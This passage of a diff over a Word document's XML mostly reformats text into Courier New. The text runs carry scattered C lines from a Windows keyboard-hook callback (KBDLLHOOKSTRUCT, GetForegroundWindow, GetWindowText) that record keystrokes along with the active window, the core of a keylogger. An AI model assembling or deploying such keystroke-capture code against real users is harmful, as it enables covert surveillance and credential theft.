-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>{</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>DWORD written;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3578,34 +4046,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>DWORD written;</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3613,34 +4079,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam;</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>SYSTEMTIME st;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3648,34 +4112,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>SYSTEMTIME st;</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>CHAR moduleName[MAX_MODULE_NAME];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3683,34 +4145,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>CHAR moduleName[MAX_MODULE_NAME];</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>DWORD winID = NULL;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3718,34 +4178,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>DWORD winID = NULL;</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>HWND activeWindow = GetForegroundWindow();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3753,34 +4211,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>HWND activeWindow = GetForegroundWindow();</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetWindowThreadProcessId(activeWindow, &amp;winID);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3788,34 +4244,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>GetWindowThreadProcessId(activeWindow, &amp;winID);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetWindowText(activeWindow, moduleName, MAX_MODULE_NAME);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3823,34 +4277,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>GetWindowText(activeWindow, moduleName, MAX_MODULE_NAME);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (winID != prevWinID || strcmp(moduleName, prevModuleName))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3858,34 +4310,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>if (winID != prevWinID || strcmp(moduleName, prevModuleName))</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3893,34 +4343,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>{</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>prevWinID = winID;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3928,43 +4385,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>prevWinID = winID;</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcpy(prevModuleName, moduleName);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3972,45 +4427,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>strcpy(prevModuleName, moduleName);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sprintf(moduleName + strlen(moduleName), " : %d", winID);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4018,43 +4469,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>sprintf(moduleName + strlen(moduleName), " : %d", winID);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
